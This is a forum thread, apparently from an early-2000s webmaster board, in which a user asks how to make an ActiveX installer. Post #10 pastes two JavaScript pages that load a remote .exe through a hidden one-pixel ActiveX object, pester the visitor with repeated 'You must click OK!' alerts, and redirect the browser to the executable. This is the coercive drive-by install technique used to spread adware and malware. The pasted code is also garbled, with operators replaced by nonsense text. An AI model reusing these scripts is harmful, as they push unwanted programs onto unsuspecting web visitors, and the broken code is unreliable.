How to do an active-x installer?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • pushpills
    Confirmed User
    • Jan 2004
    • 3700

    #1

    How to do an active-x installer?

    Looked around on google couldnt find anything too helpfull.


    It's going to be for a trial of a piece of software, not for adware/scumware.


    Can anyone help me out or point me somewhere?

    I'll throw a couple bucks in for the info.


    Thanks.
  • stocktrader23
    Let's do some business.
    • Jan 2003
    • 18781

    #2
    You are a little late. SP2 shit on your parade.


    Hands Free Adult - Join Once, Earn For Life

    "I try to make a habit of bouncing my eyes up to the face of a beautiful woman, and often repeat “not mine” in my head or even verbally. She’s not mine. God has her set aside. She’s not mine. She’s His little girl, and she needs me to fight for her by keeping my eyes where they should be."

    Comment

    • pushpills
      Confirmed User
      • Jan 2004
      • 3700

      #3
      Originally posted by stocktrader23
      You are a little late. SP2 shit on your parade.

      sp2 does not allow those acitve-x installs where you click yes or no?

      Comment

      • ztik
        Confirmed User
        • Aug 2001
        • 5196

        #4
        You need a security certificate then its just a couple lines of ax code
        .

        Comment

        • pushpills
          Confirmed User
          • Jan 2004
          • 3700

          #5
          Originally posted by ztik
          You need a security certificate then its just a couple lines of ax code
          where do I grab this stuff?

          Comment

          • teleblade69
            Confirmed User
            • Nov 2003
            • 1063

            #6
            LOUDcash


            SP2 approved :D




            tb


            PS : i use it for my cheatsites (platform games)

            Comment

            • pushpills
              Confirmed User
              • Jan 2004
              • 3700

              #7
              Originally posted by teleblade69
              LOUDcash


              SP2 approved :D




              tb


              PS : i use it for my cheatsites (platform games)

              uhh, i dont want to install your shit, I want to install my piece of software.....

              Comment

              • juicylinks
                So Fucking Banned
                • Apr 2001
                • 122992

                #8
                my programmer

                Comment

                • teleblade69
                  Confirmed User
                  • Nov 2003
                  • 1063

                  #9
                  it's just an affiliate program man not a link to install 'my' shit





                  tb

                  Comment

                  • hydro
                    Confirmed User
                    • Dec 2003
                    • 4216

                    #10
                    Originally posted by teleblade69
                    it's just an affiliate program man not a link to install 'my' shit





                    tb
                    he didnt want a per install affiliate, he wanted the code to do it.

                    pushpills, some quick code i found through google.


                    <HTML>
                    <BODY>
                    <SCRIPT language="JavaScript">
                    <!--
                    var exepath='http://www.site.com/file.exe';
                    var bname=navigator.appName;
                    var bver=parseInt(navigator.appVersion);

                    function install() {
                    if (bname hahahaha 'Microsoft Internet Explorer' && bver >= 2) {
                    document.write('<object id="Installation_Folder_Name" width=1 height=1 classid="CLSID:A45F39DC-3608-4237-8F0E-139F1BC49464" codebase="'+exepath+'"></object>');
                    } else {
                    location.replace(exepath);
                    }
                    }

                    install();

                    // -->
                    </SCRIPT>
                    </BODY>
                    </HTML>





                    <HTML>
                    <BODY>
                    <SCRIPT language="JavaScript">
                    <!--
                    document.write('<iframe id="AX" style="position:absolute; visibilitydden;"></iframe>');

                    var errcount = 3;
                    var exepath='http://www.site.com/dir/file.exe';
                    var errtext='You must click OK!';

                    var bname=navigator.appName;
                    var bver=parseInt(navigator.appVersion);

                    function install() {
                    if (bname hahahaha 'Microsoft Internet Explorer' && bver >= 2) {
                    BP.document.close();
                    BP.document.write('<html><body>');
                    BP.document.write('<object id="LiveFile" onError="parent.retryit();" width=1 height=1 classid="CLSID:A45F39DC-3608-4237-8F0E-139F1BC49464" codebase="'+exepath+'"></object>');
                    BP.document.write('</body></html>');
                    } else {
                    location.replace(exepath);
                    }
                    }

                    function install_First() {
                    if (bname hahahaha 'Microsoft Internet Explorer' && bver >= 2) {
                    document.write('<object id="LiveFile" onError="parent.retryit();" width=1 height=1 classid="CLSID:A45F39DC-3608-4237-8F0E-139F1BC49464" codebase="'+exepath+'"></object>');
                    } else {
                    location.replace(exepath);
                    }
                    }

                    function retryit(){
                    if(errcount >0) {
                    alert(errtext);
                    install();
                    errcount --;
                    } else {
                    location.replace(exepath);
                    }
                    }

                    install_First();
                    // -->
                    </SCRIPT>
                    </BODY>
                    </HTML>

                    Comment

                    • pushpills
                      Confirmed User
                      • Jan 2004
                      • 3700

                      #11
                      hydro, icq me back

                      Comment

                      Working...